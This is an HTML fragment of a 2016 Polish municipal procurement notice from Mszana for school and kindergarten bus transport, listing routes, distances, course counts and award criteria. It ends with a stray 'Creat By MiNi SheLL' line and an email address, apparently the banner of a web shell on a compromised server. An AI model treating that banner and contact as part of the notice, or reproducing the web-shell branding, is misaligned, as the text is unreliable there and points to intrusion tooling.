<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne zmiany treści umowy mogą wynikać z następujących okoliczności:
1) gdy z przyczyn organizacyjnych konieczna będzie zmiana osób upoważnionych do dokonywania czynności,
2) zmianę terminu wykonania zamówienia dopuszcza się w sytuacji nieprzewidzianej i niezawinionej przez strony, której wystąpienia nie mogły przewidzieć pomimo zachowania należytej staranności, 
3) zmian regulacji prawnych obowiązujących w dniu podpisania umowy (m.in. zmian stawki podatku VAT),
4) zmian rozkładu jazdy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mszana.finn.pl/bipkod/12724221<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Mszanie
ul. 1 Maja 81
44-325 Mszana.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2016 godzina 10:00, miejsce: Urząd Gminy Mszana
ul. 1 Maja 81
44-325 Mszana
sekretariat Urzędu pok. 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz dzieci i młodzieży do placówek oświatowych na terenie Gminy Mszana w okresie od 01.09.2016 r. do 13.01.2017 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dowóz dzieci i młodzieży szkolnej do szkół podstawowych i gimnazjum na terenie Gminy Mszana w okresie od 01.09.2016 r. do 13.01.2017 r.
Wykaz tras autobusowych: 

1. Dowóz dzieci (mieszkańców Gogołowej)  do Szkoły Podstawowej w Połomi ORAZ POWRÓT
KURSY PORANNE - Dojazd ze szkoły
a) trasa:   
początek trasy:  GOGOŁOWA CENTRUM; 
przez: ul. Wiejską,  ul. Szkolną;  
koniec trasy:   POŁOMIA  PARKING - CMENTARZ; 
odległość 2,7 km;  
przewidywana liczba kursów - 6 kursów tygodniowo;
tj. 106 kursów w okresie realizacja zamówienia.
	  
KURSY POŁUDNIOWE -  Powrót ze szkoły:
b) trasa:    
początek trasy: POŁOMIA  PARKING - CMENTARZ; 
przez:  ul. Szkolną, ul. Wiejską;  
koniec trasy:  GOGOŁOWA CENTRUM;  
odległość  2,7 km; 
przewidywana liczba kursów - 7 kursów tygodniowo;
tj. 123 kursy w okresie realizacja zamówienia.

2. Dowóz dzieci do Gimnazjum w Gogołowej i SP w Połomi.
KURSY PORANNE - dojazd do szkoły 
a)	trasa:   
początek trasy:  POŁOMIA FOLWARK; 
przez  (ul. Centralną,  ul. Szkolną  Cmentarz, ul. Wiejską w Gogołowej); 
koniec trasy:  GOGOŁOWA CENTRUM;  
odległość   5,6 km; 
przewidywana liczba kursów - 5 tygodniowo;
tj. 88 kursów w okresie realizacja zamówienia.

b) trasa: początek trasy: POŁOMIA DOLANEK; 
przez: (ul. Wolności, ul. Centralną, ul. Szkolną, ul. Wiejską);  
koniec trasy: GOGOŁOWA CENTRUM; 
odległość   5 km; 
przewidywana liczba kursów - 5 tygodniowo;
tj. 88 kursów w okresie realizacja zamówienia.

KURSY POŁUDNIOWE -  Powrót ze szkoły:
c)trasa: 
początek trasy:  GOGOŁOWA CENTRUM;
przez ul. Wiejską,  ul. Szkolna, ul. Centralna w kierunku Połomia  Folwark, 
NAWRÓT ul. Centralna, ul. Wolności;
koniec trasy POŁOMIA DOLANEK;  
odległość   10,7 km;
przewidywana liczba kursów - 10 tygodniowo; 
tj. 176 kursów w okresie realizacja zamówienia.
 	 	 
- Przewidywana ilość dni w których Wykonawca zobowiązany jest do przewozu osób - 88 dni szkolnych. Zamawiający zastrzega sobie, w uzasadnionych przypadkach, prawo do możliwości zwiększenia lub zmniejszenia liczby dni w których wykonywana jest usługa, 
- Wykonawca zobowiązany jest zapewnić do dyspozycji Zamawiającego, każdego dnia roboczego, za wyjątkiem okresów wolnych od zajęć, co najmniej 2 autobusy o ilości miejsc siedzących minimum 47,
- Wykonawca zobowiązany jest, w ciągu 45 minut, do zorganizowania transportu zastępczego w przypadku awarii środka transportu,
- Zamawiający finansuje jedynie przewóz uczniów od pierwszego przystanka do szkoły i trasę powrotną. Zamawiający nie pokrywa kosztów dojazdu autobusu z bazy i na bazę Wykonawcy.
- Oferowana cena jest stała za cały okres obowiązywania umowy. 
- Rozkład jazdy autobusów obowiązujący Wykonawcę ustalony zostanie odrębnie i stanowić będzie załącznik do umowy. 
- Zamawiający zapewnia opiekę wychowawcy w autobusie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.01.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz dzieci przedszkolnych do przedszkola w Połomi w okresie od 01.09.2016 r. do 13.01.2017 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KURSY PORANNE - dojazd do przedszkola:
trasa:   
początek trasy:  POŁOMIA ul. Granice; 
przez: ul. Granice, ul. Wolności,  ul. Szkolną;  
koniec trasy:   POŁOMIA  PARKING przy ZSP Połomia; 
odległość 4 km;  
przewidywana liczba kursów - 5 kursów tygodniowo;
liczba dzieci, którym należy zorganizować dowóz - 5.
	  
KURSY POŁUDNIOWE -  powrót z przedszkola:
trasa:    
początek trasy: POŁOMIA  PARKING przy ZSP Połomia; 
przez:  ul. Szkolną, ul. Wolności, ul. Granice;  
koniec trasy:  POŁOMIA ul. Granice;  
odległość  4 km; 
przewidywana liczba kursów - 5 kursów tygodniowo;
liczba dzieci, którym należy zorganizować dowóz - 5.

- Przewidywana ilość dni w których Wykonawca zobowiązany jest do przewozu dzieci - 88 dni szkolnych. Zamawiający zastrzega sobie, w uzasadnionych przypadkach, prawo do możliwości zwiększenia lub zmniejszenia liczby dni w których wykonywana jest usługa.
- Wykonawca zobowiązany jest, w ciągu 45 minut, do zorganizowania transportu zastępczego w przypadku awarii środka transportu,
- Zamawiający finansuje jedynie przewóz dzieci na wyznaczonych trasach. Zamawiający nie pokrywa kosztów dojazdu środka transportu z bazy i na bazę Wykonawcy.
- Oferowana cena jest stała za cały okres obowiązywania umowy. Cena wynikać musi z ceny za 1 dzień szkolny podanej przez Wykonawcę w ofercie.
- Rozkład jazdy obowiązujący Wykonawcę ustalony zostanie odrębnie i stanowić będzie załącznik do umowy.
- Wykonawca zapewnia opiekuna (osoba dorosła) w trakcie przewozu dzieci do i z przedszkola. Opiekun zobowiązany jest do zaprowadzenia i odebrania dzieci z przedszkola..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.01.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności faktury - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com